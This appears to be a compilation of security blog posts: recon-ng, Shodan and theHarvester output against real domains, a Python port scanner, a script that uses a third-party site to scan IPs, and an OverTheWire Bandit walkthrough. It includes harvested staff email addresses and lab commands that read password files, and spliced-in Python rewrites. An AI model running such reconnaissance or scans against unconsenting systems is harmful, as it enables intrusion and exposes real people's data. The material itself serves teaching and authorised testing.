Let’s try a different module then take another look at the hosts.

[recon-ng][demo][bing_domain_web] > search shodan
[*] Searching for 'shodan'...

 Recon
 -----
 recon/domains-hosts/shodan_hostname
 recon/hosts-ports/shodan_ip
 recon/locations-pushpins/shodan
 recon/netblocks-hosts/shodan_net

[recon-ng][demo][bing_domain_web] > use recon/domains-hosts/shodan_hostname
[recon-ng][demo][shodan_hostname] > run

--------
SANS.ORG
--------
[*] Searching Shodan API for: hostname:sans.org
[*] [port] 204.51.94.14 (25/<blank>) - smtp31b.sans.org
[*] [host] smtp31b.sans.org (204.51.94.14)
[*] [port] 66.35.59.19 (80/<blank>) - web23a.den.sans.org
[*] [host] web23a.den.sans.org (66.35.59.19)
[*] [port] 66.35.59.8 (53/<blank>) - dns21b.sans.org
[*] [host] dns21b.sans.org (66.35.59.8)
(cropped for brevity)

[recon-ng][demo][shodan_hostname] > show hosts

 +--------------------------------------------------------------------------------------------------------------------+
 | rowid | host | ip_address | region | country | latitude | longitude | module |
 +--------------------------------------------------------------------------------------------------------------------+
 | 1 | files.sans.org | | | | | | bing_domain_web |
 | 2 | labs.sans.org | | | | | | bing_domain_web |
 | 3 | www.sans.org | | | | | | bing_domain_web |
 | 4 | cyber-defense.sans.org | | | | | | bing_domain_web |
(cropped for brevity)
 | 42 | smtp31b.sans.org | 204.51.94.14 | | | | | shodan_hostname |
 | 43 | web23a.den.sans.org | 66.35.59.19 | | | | | shodan_hostname |
 | 44 | dns21b.sans.org | 66.35.59.8 | | | | | shodan_hostname |
 | 45 | admin.sans.org | 204.51.94.215 | | | | | shodan_hostname |
 | 46 | 204-51-94-246.clp.sans.org | 204.51.94.246 | | | | | shodan_hostname |
 | 47 | labs.sans.org | 204.51.94.233 | | | | | shodan_hostname |


Theharvester

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.
This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization. Source: https://code.google.com/p/theharvester/

┌─[kali]─[~]
└──> theharvester -d chkd.org -b all -e chsext1.chkd.org

*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.7 *
* Coded by Christian Martorella *
* Edge-Security Research *
* cmartorella@edge-security.com *
*******************************************************************


Full harvest..
[-] Searching in Google..
 Searching 0 results...
 Searching 100 results...
[-] Searching in PGP Key server..
[-] Searching in Bing..
 Searching 50 results...
 Searching 100 results...
[-] Searching in Exalead..
 Searching 50 results...
 Searching 100 results...
 Searching 150 results...


[+] Emails found:
------------------
+john.harrington@chkd.org
ASampson@chkd.org
Amy.Sampson@chkd.org
Amy@chkd.org
Barbara.Benson@chkd.org
Beach@chkd.org
Beverly.Jacobson@chkd.org
(cropped for brevity)
[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs... 
92.242.140.21:2Fwww.chkd.org
208.255.163.169:apihrp.chkd.org
157.21.35.200:kdmedia.chkd.org
208.255.163.168:mekids.chkd.org
208.255.163.189:webmail.chkd.org
208.255.163.163:www.chkd.org
[+] Virtual hosts:
==================
208.255.163.169 apihrp.chkd.org
157.21.35.200 kdmedia.chkd.org
208.255.163.189 webmail.chkd.org
208.255.163.163 www.chkd.org
208.255.163.163 208.255.163.163

Network-tools.com

This site offers a number of web-based tools, including:

Express
Ping
Trace
Whois (IDN Conversion Tool)
DNS Records (Advanced Tool)
Network Lookup
Spam Blacklist Check
URL Decode
URL Encode
HTTP Headers SSL
Email Tests

One of the tools I find useful on this site is the Network Lookup. Enter an IP address or domain name and it will show the network address/range, which is useful for finding IP address ranges owned by the target to include in active scans. This is the output of checking “Network Lookup” on www.sans.org.

NetRange: 66.35.59.0 - 66.35.59.255
CIDR: 66.35.59.0/24

Netcraft Toolbar

http://toolbar.netcraft.com/site_report

This site is useful to see what technology a website is running.

SiteDigger

http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx

SiteDigger 3.0 searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.


Shodan.io

https://www.shodan.io/

The search engine for the Internet of Things

Think of Shodan as a search engine that returns results that include the banner of a site or device. Want to find open vulnerable sites, VNC servers, IoT devices, webcams that don’t require authentication and allow you to waste hours of your day? You can also use shodan to generate a list of target IP addresses, export the list, and import into your security tool of choice.

You can find a free guide to Shodan on exploit-db.com:  https://www.exploit-db.com/docs/33859.pdf

Maltego

Maltego Community Edition is pre-installed in Kali Linux.

Maltego is an interactive data mining tool that renders directed graphs for link analysis. The tool is used in online investigations for finding relationships between pieces of information from various sources located on the Internet. Maltego uses the idea of transforms to automate the process of querying different data sources. This information is then displayed on a node based graph suited for performing link analysis.

Currently there are three versions of the Maltego client namely Maltego CE, Maltego Classic and Maltego XL. This page will focus on Maltego Community Edition (CE). All three Maltego clients come with access to a library of standard transforms for the discovery of data from a wide range of public sources that are commonly used in online investigations and digital forensics.

Port scan and grab banners in Python

Just a simple port scanner and banner grabber written in Python. I wrote it because I didn’t have admin privileges to install nmap at the time (I was a new employee, less than 90 days in), I wanted to sharpen my Python skills, and I needed to find out whether a particular port was open.

The instructions are simple. Just run “python simpleportscanner.py” and it will prompt for an IP address. As written it scans a fixed list of TCP ports. Edit the code to scan the ports you want, or pass the port numbers on the command line.

#!/usr/bin/env python
# Python 2 script (raw_input and the print statement)
import socket
from multiprocessing.dummy import Pool as ThreadPool
import sys
from datetime import datetime

# Clear the screen (Windows only; left disabled)
# import subprocess
# subprocess.call('cls', shell=True)

# Ask for input
remoteServer = raw_input("Enter a remote host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)

# Print a nice banner with information on which host we are about to scan
print "-" * 60
print "Please wait, scanning remote host", remoteServerIP
print "-" * 60

# Check what time the scan started
t1 = datetime.now()

def scan(port):
    # One TCP connect per port. The timeout keeps a service that accepts
    # the connection but never answers from blocking the worker in recv().
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(2)
    result = sock.connect_ex((remoteServerIP, port))
    if result == 0:
        try:
            sock.send("Server:\r\n")      # nudge the service into answering
            banner = sock.recv(1024).strip()
        except socket.error:
            banner = ""                   # open, but silent
        print "Port {}: Open".format(port), " - ", banner
    sock.close()

# function to be mapped over
def scanParallel(ports, threads=4):
    pool = ThreadPool(threads)
    results = pool.map(scan, ports)
    pool.close()
    pool.join()
    return results

if __name__ == "__main__":
    # Default port list; override it by passing port numbers on the command line
    ports = (20,21,22,23,53,69,80,88,110,123,135,137,138,139,143,161,389,443,445,464,512,513,631,860,1080,1433,1434,3124,3128,3306,3389,5800,5900,8080,10000)
    if len(sys.argv) > 1:
        ports = tuple(int(p) for p in sys.argv[1:])
    results = scanParallel(ports, 4)

    # Checking the time again
    t2 = datetime.now()

    # Calculates the difference of time, to see how long it took to run the script
    total = t2 - t1

    # Printing the information to screen
    print 'Scanning Completed in: ', total

Get the code: https://raw.githubusercontent.com/sdcampbell/simpleportscanner/master/simpleportscanner.py
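A Python 3 version of the same idea, added here as an example (it is not the script linked above): the scanner above calls recv() with no timeout, so a service that accepts the connection but never sends anything can block a worker thread indefinitely. This version bounds every socket call, returns results as data instead of printing them, and ships with a constructed local listener (start_test_service, free_port) so it can be run offline against itself. All function and service names are mine, not the page's.

```python
"""Banner grabbing with timeouts (added example, Python 3; not the page's script)."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def grab_banner(host, port, timeout=1.0, probe=b"Server:\r\n"):
    """Connect to one TCP port, send a short probe, read whatever comes back.

    Returns {"port": int, "open": bool, "banner": str}. No call blocks longer
    than `timeout`, so a silent listener costs one timeout, not a hang.
    """
    result = {"port": port, "open": False, "banner": ""}
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        if sock.connect_ex((host, port)) != 0:   # non-zero errno: closed or filtered
            return result
        result["open"] = True
        sock.sendall(probe)
        try:
            data = sock.recv(1024)
        except socket.timeout:                    # open, but nothing was sent back
            data = b""
        result["banner"] = data.decode("utf-8", "replace").strip()
    except OSError:
        pass                                      # any other network error: keep what we have
    finally:
        sock.close()
    return result


def scan_ports(host, ports, threads=4, timeout=1.0):
    """Scan `ports` on `host` concurrently; returns one result dict per port, in order."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        return list(pool.map(lambda p: grab_banner(host, p, timeout), ports))


# --- constructed fixture: a local TCP listener, optionally greeting with a banner ---
def start_test_service(banner=b""):
    """Listen on an OS-assigned 127.0.0.1 port; returns (port, stop_event)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(5)
                try:
                    if banner:
                        conn.sendall(banner)
                    while conn.recv(1024):        # hold the connection until the peer closes
                        pass
                except OSError:
                    pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stop


def free_port():
    """An unused 127.0.0.1 port, to demonstrate the closed-port case."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    chatty, stop_a = start_test_service(b"SSH-2.0-ConstructedBanner\r\n")
    silent, stop_b = start_test_service()
    for r in scan_ports("127.0.0.1", [chatty, silent, free_port()], timeout=0.5):
        state = "Open" if r["open"] else "Closed"
        print("Port {}: {} - {!r}".format(r["port"], state, r["banner"]))
    stop_a.set()
    stop_b.set()
```

The silent listener is the case worth noticing: it is reported as open with an empty banner after one timeout, where the original script would sit in recv() for as long as the remote side kept the connection up.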

Bounce Scan Python Script

I was giving a presentation on Passive Information Gathering this week to the 757 White Hat Hacker meetup group that I organize. I found this website, yougetsignal.com, that allows you to scan a limited range of ports on your internet gateway IP address, or specify an IP address and port to scan.

The hacker in me thought about how I could use this to perform passive reconnaissance. I’m always looking for a reason to solve a problem or save some time using Python, and this seemed like a good excuse to brush up on my Python web request skills. Sure, this may not be very useful to some. For me it’s an excuse to learn Python web requests. Feel free to use it and suggest improvements on my github page. Don’t be too harsh, I know there are a lot of things I can improve in this script. This is just something I whipped up quickly before breakfast this morning.

The http request captured by Burp Suite:


The code:

#!/usr/bin/env python

# Import our libraries
import sys
import requests
from bs4 import BeautifulSoup

# Get the IP address from the command line
if len(sys.argv) != 2:
    sys.exit("Usage: bounce-scan.py <ip address>")
ipAddress = sys.argv[1]
# The site's short-scan endpoint
url = "http://ports.yougetsignal.com/short-scan.php"
# Our post value
values = {"remoteAddress": ipAddress}
# Do the post (with a timeout so the script cannot hang forever)
r = requests.post(url, data=values, timeout=30)
# Use BeautifulSoup to parse html
soup = BeautifulSoup(r.content, 'html.parser')
# Strip html out and print text
print(soup.get_text())

The result of scanning 8.8.8.8:

C:\Users\sdcam\Documents>python bounce-scan.py 8.8.8.8
 Port 21 is closed on 8.8.8.8.
 Port 22 is closed on 8.8.8.8.
 Port 23 is closed on 8.8.8.8.
 Port 25 is closed on 8.8.8.8.
 Port 53 is open on 8.8.8.8.
 Port 80 is closed on 8.8.8.8.
 Port 110 is closed on 8.8.8.8.
 Port 115 is closed on 8.8.8.8.
 Port 135 is closed on 8.8.8.8.
 Port 139 is closed on 8.8.8.8.
 Port 143 is closed on 8.8.8.8.
 Port 194 is closed on 8.8.8.8.
 Port 443 is closed on 8.8.8.8.
 Port 445 is closed on 8.8.8.8.
 Port 1433 is closed on 8.8.8.8.
 Port 3306 is closed on 8.8.8.8.
 Port 3389 is closed on 8.8.8.8.
 Port 5632 is closed on 8.8.8.8.
 Port 5900 is closed on 8.8.8.8.
 Port 6112 is closed on 8.8.8.8.
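To do something with that text beyond printing it, here is an added example (not the bounce-scan script above, and not an API of the site): it validates the IP argument before anything is sent, takes the fetch step as a parameter so the parser can be exercised offline, and turns the "Port N is open/closed on X." sentences into a dict you can filter. SCAN_URL is the endpoint the script above posts to; SAMPLE_RESPONSE is constructed, not captured from the site; the assumption that each result sentence is not split across HTML tags is mine, as are all the function names.

```python
"""Parse a web port-check response into structured results (added example, Python 3)."""
import ipaddress
import re

SCAN_URL = "http://ports.yougetsignal.com/short-scan.php"   # the endpoint the page's script posts to
LINE_RE = re.compile(r"Port\s+(\d+)\s+is\s+(open|closed)\s+on\s+([0-9.]+)\.")


def fetch_short_scan(ip):
    """Default fetcher: the same POST the page's script makes (needs the `requests` package)."""
    import requests  # imported lazily so the parser itself has no third-party dependency
    r = requests.post(SCAN_URL, data={"remoteAddress": ip}, timeout=15)
    r.raise_for_status()
    return r.text


def parse_scan_text(text):
    """Return ({port: 'open'|'closed'}, {target IPs mentioned}) from result text."""
    results, targets = {}, set()
    for m in LINE_RE.finditer(text):
        results[int(m.group(1))] = m.group(2)
        targets.add(m.group(3))
    return results, targets


def open_ports(results):
    """Sorted list of ports reported open."""
    return sorted(p for p, state in results.items() if state == "open")


def bounce_scan(ip, fetch=fetch_short_scan):
    """Validate `ip`, fetch the page, strip tags, parse. Raises ValueError on a malformed IP."""
    ipaddress.ip_address(ip)                      # reject junk before anything leaves the machine
    html = fetch(ip)
    text = re.sub(r"<[^>]+>", " ", html)          # assumption: a result sentence is never split by tags
    return parse_scan_text(text)


# Constructed sample response (not captured from the site), with page chrome mixed in
SAMPLE_RESPONSE = """<html><body><h1>Port Forwarding Tester</h1>
<p>Port 21 is closed on 8.8.8.8.</p>
<p>Port 22 is closed on 8.8.8.8.</p>
<p>Port 53 is open on 8.8.8.8.</p>
<p>Port 80 is closed on 8.8.8.8.</p>
<p>Some unrelated footer text.</p></body></html>"""


if __name__ == "__main__":
    import sys
    # With an argument, query the site; without one, run against the constructed sample.
    if len(sys.argv) > 1:
        target, fetcher = sys.argv[1], fetch_short_scan
    else:
        target, fetcher = "8.8.8.8", (lambda ip: SAMPLE_RESPONSE)
    results, _ = bounce_scan(target, fetch=fetcher)
    for port, state in sorted(results.items()):
        print("Port {} is {} on {}".format(port, state, target))
    print("open:", open_ports(results))
```

Passing the fetcher in is what makes the parser testable without network access; it also makes it easy to swap in a cached copy of a response when you want to re-check an old result.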

My first Capture the Flag

I participated in my first CTF at Bsides Raleigh last week. I had an awesome time and placed 4th out of 23 teams despite losing more than half of the competition time while watching conference presentations, and competing solo. I was really surprised to receive a prize for 4th place. I got a Software Defined Radio (SDR) USB device. I jokingly said that they must have felt sorry for the old guy competing in his first CTF and dug a prize out of their personal stash. 🙂


OverTheWire Bandit

I’m always looking for a new challenge. The OverTheWire Bandit CTF tests Linux and Bash scripting skills through a series of security challenges. There are 27 levels.

Level 0 to 1

The goal of this level is for you to log into the game using SSH. The host to which you need to connect is bandit.labs.overthewire.org. The username is bandit0 and the password is bandit0. Once logged in, go to the Level 1 page to find out how to beat Level 1.

The password for the next level is stored in a file called readme located in the home directory. Use this password to log into bandit1 using SSH. Whenever you find a password for a level, use SSH to log into that level and continue the game.

To get the password you simply had to cat the readme file.

bandit0@melinda:~$ ls
readme
bandit0@melinda:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1


Level 1 to 2

The password for the next level is stored in a file called – located in the home directory.
Commands you may need to solve this level: ls, cd, cat, file, du, find

There are different ways of accomplishing the same task in Bash:

bandit1@melinda:~$ cat `find . -name '-' -print`
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ find . -name '-' -exec cat {} +
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ find . -name '-' | xargs cat
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ cat $(find . -name '-')
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$


Level 2 to 3

The password for the next level is stored in a file called spaces in this filename located in the home directory.
Commands you may need to solve this level: ls, cd, cat, file, du, find

bandit2@melinda:~$ cat spaces\ in\ this\ filename
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK


Level 3 to 4

The password for the next level is stored in a hidden file in the inhere directory.

The ‘-a’ option to the ‘ls’ command shows hidden files. Files are hidden when the name is preceded by a period.

bandit3@melinda:~$ ls -al inhere
total 12
drwxr-xr-x 2 root root 4096 Nov 14 2014 .
drwxr-xr-x 3 root root 4096 Nov 14 2014 ..
-rw-r----- 1 bandit4 bandit3 33 Nov 14  2014 .hidden
bandit3@melinda:~$ cat inhere/.hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB


Level 4 to 5

The password for the next level is stored in the only human-readable file in the inhere directory. Tip: if your terminal is messed up, try the “reset” command.

bandit4@melinda:~/inhere$ file ./* | grep text
./-file07: ASCII text
bandit4@melinda:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh


Level 5 to 6

The password for the next level is stored in a file somewhere under the inhere directory and has all of the following properties:
- human-readable
- 1033 bytes in size
- not executable

bandit5@melinda:~$ cd inhere/
bandit5@melinda:~/inhere$ find . -type f -size 1033c ! -executable | xargs file | grep text | cut -d ":" -f 1 | xargs -I % sh -c "echo % ; cat %"
./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7


Level 6 to 7

The password for the next level is stored somewhere on the server and has all of the following properties:
- owned by user bandit7
- owned by group bandit6
- 33 bytes in size

bandit6@melinda:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null | xargs -I % sh -c "echo % ; cat %"
/var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs


Level 7 to 8

The password for the next level is stored in the file data.txt next to the word millionth.

bandit7@melinda:~$ cat data.txt | grep millionth
millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV


Level 8 to 9

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once.

bandit8@melinda:~$ sort data.txt | uniq --count | grep "1 "
1 UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR


Level 9 to 10

The password for the next level is stored in the file data.txt in one of the few human-readable strings, beginning with several ‘=’ characters.

bandit9@melinda:~$ strings data.txt | grep "^=\+"
========== password
========== ism
========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk


Level 10 to 11

The password for the next level is stored in the file data.txt, which contains base64 encoded data.

bandit10@melinda:~$ cat data.txt | base64 -d
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR


Level 11 to 12

The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions.

bandit11@melinda:~$ cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
bandit11@melinda:~$
bandit11@melinda:~$ cat data.txt | python -c 'import sys; print sys.stdin.read().decode("rot13")'
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu


Level 12 to 13

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!).

bandit12@melinda:~$ ls
data.txt
bandit12@melinda:~$ mkdir /tmp/123
bandit12@melinda:~$ cp data.txt /tmp/123
bandit12@melinda:~$ cd /tmp/123
bandit12@melinda:/tmp/123$ ls
data.txt
bandit12@melinda:/tmp/123$ xxd -r data.txt > file
bandit12@melinda:/tmp/123$ file file
file: gzip compressed data, was "data2.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv file file.gz
bandit12@melinda:/tmp/123$ gzip -d file.gz
bandit12@melinda:/tmp/123$ ls
data.txt file
bandit12@melinda:/tmp/123$ file file
file: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ mv file file.bz2
bandit12@melinda:/tmp/123$ bzip2 -d file.bz2
bandit12@melinda:/tmp/123$ ls
data.txt file
bandit12@melinda:/tmp/123$ file file
file: gzip compressed data, was "data4.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv file file.gz
bandit12@melinda:/tmp/123$ ls
data.txt file.gz
bandit12@melinda:/tmp/123$ gzip -d file.gz
bandit12@melinda:/tmp/123$ file file
file: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf file
data5.bin
bandit12@melinda:/tmp/123$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data5.bin
data6.bin
bandit12@melinda:/tmp/123$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ mv data6.bin data6.bz2
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6.bz2 file
bandit12@melinda:/tmp/123$ bzip2 -d data6.bz2
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 file
bandit12@melinda:/tmp/123$ ls -l
total 48
-rw-r----- 1 bandit12 bandit12 2546 Sep 21 09:40 data.txt
-rw-r--r-- 1 bandit12 bandit12 10240 Nov 14  2014 data5.bin
-rw-r--r-- 1 bandit12 bandit12 10240 Nov 14  2014 data6
-rw-rw-r-- 1 bandit12 bandit12 20480 Sep 21 09:43 file
bandit12@melinda:/tmp/123$ file file
file: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf file
data5.bin
bandit12@melinda:/tmp/123$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data5.bin
data6.bin
bandit12@melinda:/tmp/123$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ bzip -d data6.bin
-bash: bzip: command not found
bandit12@melinda:/tmp/123$ bzip2 -d data6.bin
bzip2: Can't guess original name for data6.bin -- using data6.bin.out
bandit12@melinda:/tmp/123$ file data6.bin.out
data6.bin.out: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data6.bin.out
data8.bin
bandit12@melinda:/tmp/123$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv data8.bin data8.gz
bandit12@melinda:/tmp/123$ gzip -d data8.bin
gzip: data8.bin.gz: No such file or directory
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 data6.bin.out data8.gz file
bandit12@melinda:/tmp/123$ gzip -d data8.gz
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 data6.bin.out data8 file
bandit12@melinda:/tmp/123$ ls -l
total 64
-rw-r----- 1 bandit12 bandit12 2546 Sep 21 09:40 data.txt
-rw-r--r-- 1 bandit12 bandit12 10240 Nov 14  2014 data5.bin
-rw-r--r-- 1 bandit12 bandit12 10240 Nov 14  2014 data6
-rw-r--r-- 1 bandit12 bandit12 10240 Nov 14  2014 data6.bin.out
-rw-r--r-- 1 bandit12 bandit12 49 Nov 14  2014 data8
-rw-rw-r-- 1 bandit12 bandit12 20480 Sep 21 09:43 file
bandit12@melinda:/tmp/123$ file data8
data8: ASCII text
bandit12@melinda:/tmp/123$ cat data8
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
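The same unwrapping, automated, as an added example in Python 3 (it is not part of the level or of OverTheWire): instead of running file by hand after every step, it sniffs the magic bytes of gzip, bzip2 and tar, peels one layer at a time, and stops when plain data remains. It also caps the number of layers and the inflated size of each layer, which matters as soon as the blob comes from somewhere you do not control. The sample input is constructed in build_sample (a hexdump of a gzip of a tar of a bzip2 of a gzip of a placeholder line), not the level's real data.txt, and every function name here is mine.

```python
"""Unwrap a hexdump of a repeatedly compressed file (added example, Python 3).

Not part of the page: automates the xxd / file / gzip / bzip2 / tar loop from
the level above by sniffing magic bytes, with bounds on layer count and size.
"""
import bz2
import gzip
import io
import tarfile
import zlib


def detect(data):
    """Identify a layer from its magic bytes: gzip, bzip2, tar or plain."""
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if data[:3] == b"BZh":
        return "bzip2"
    if len(data) >= 512 and data[257:262] == b"ustar":  # POSIX/GNU tar magic at offset 257
        return "tar"
    return "plain"


def bounded_decompress(data, kind, max_bytes):
    """Inflate at most max_bytes+1 bytes, so a decompression bomb is caught before it is fully inflated."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS) if kind == "gzip" else bz2.BZ2Decompressor()
    out = d.decompress(data, max_bytes + 1)
    if len(out) > max_bytes:
        raise ValueError("layer inflates past %d bytes" % max_bytes)
    if not d.eof:
        raise ValueError("truncated or corrupt %s stream" % kind)
    return out


def unwrap_once(data, max_bytes):
    """Peel one layer; returns (inner_bytes, kind). Plain data comes back unchanged."""
    kind = detect(data)
    if kind in ("gzip", "bzip2"):
        return bounded_decompress(data, kind, max_bytes), kind
    if kind == "tar":
        with tarfile.open(fileobj=io.BytesIO(data)) as tf:
            files = [m for m in tf.getmembers() if m.isfile()]
            if len(files) != 1 or files[0].size > max_bytes:
                raise ValueError("expected one file of at most %d bytes in tar" % max_bytes)
            return tf.extractfile(files[0]).read(), kind
    return data, kind


def unwrap_all(data, max_layers=32, max_bytes=50 * 1024 * 1024):
    """Peel layers until plain data remains; returns (plain_bytes, [kinds peeled, outermost first])."""
    layers = []
    for _ in range(max_layers):
        inner, kind = unwrap_once(data, max_bytes)
        if kind == "plain":
            return data, layers
        layers.append(kind)
        data = inner
    raise ValueError("more than %d layers; refusing to continue" % max_layers)


def from_xxd(text):
    """Reverse an xxd hexdump (what `xxd -r` does), ignoring the offset and ASCII columns."""
    out = bytearray()
    for line in text.splitlines():
        if ":" in line:
            hexpart = line.split(":", 1)[1].split("  ", 1)[0]  # hex column ends at the double space
            out += bytes.fromhex(hexpart.replace(" ", ""))
    return bytes(out)


def to_xxd(data, width=16):
    """xxd-style dump; used here only to construct the sample input offline."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        pairs = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append("%08x: %-*s  %s" % (off, width * 2 + width // 2 - 1, pairs, text))
    return "\n".join(lines) + "\n"


def build_sample(plain):
    """Constructed stand-in for the level's data.txt: hexdump of gzip(tar(bzip2(gzip(plain))))."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("data5.bin")
        inner = bz2.compress(gzip.compress(plain))
        info.size = len(inner)
        tf.addfile(info, io.BytesIO(inner))
    return to_xxd(gzip.compress(buf.getvalue()))


if __name__ == "__main__":
    dump = build_sample(b"The password is <placeholder, not a real level password>\n")
    plain, layers = unwrap_all(from_xxd(dump))
    print("layers peeled:", " -> ".join(layers))
    print(plain.decode())
```

from_xxd handles the standard xxd layout only (offset, colon, hex pairs, two spaces, ASCII column); xxd -r itself is more forgiving. The size bound is enforced per layer while inflating, not after the fact, which is the part that actually protects you from a hostile archive.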


Level 13 to 14

The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on

bandit13@melinda:~$ ls
sshkey.private
bandit13@melinda:~$ ls -l /etc/bandit_pass/bandit14
-r-------- 1 bandit14 bandit14 33 Nov 14  2014 /etc/bandit_pass/bandit14
bandit13@melinda:~$
bandit13@melinda:~$ ssh -i ./sshkey.private bandit14@localhost

bandit14@melinda:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e


Level 14 to 15

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.

bandit14@melinda:~$ echo 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e | nc localhost 30000
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr


Level 15 to 16

The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.

bandit15@melinda:~$ openssl s_client -quiet -connect 127.0.0.1:30001
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd


Level 16 to 17

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

bandit16@melinda:~$ openssl s_client -quiet -connect localhost:31790
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
-----BEGIN RSA PRIVATE KEY-----
(key body omitted)
-----END RSA PRIVATE KEY-----


Level 17 to 18

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new

NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19

Save the cert above to cert.cer.

steve@steve-nuc:~$ chmod 400 cert.cer
steve@steve-nuc:~$ ssh -i cert.cer bandit17@bandit.labs.overthewire.org

bandit17@melinda:~$ diff passwords.old passwords.new
42c42
< BS8bqB1kqkinKJjuxL6k072Qq9NRwQpR

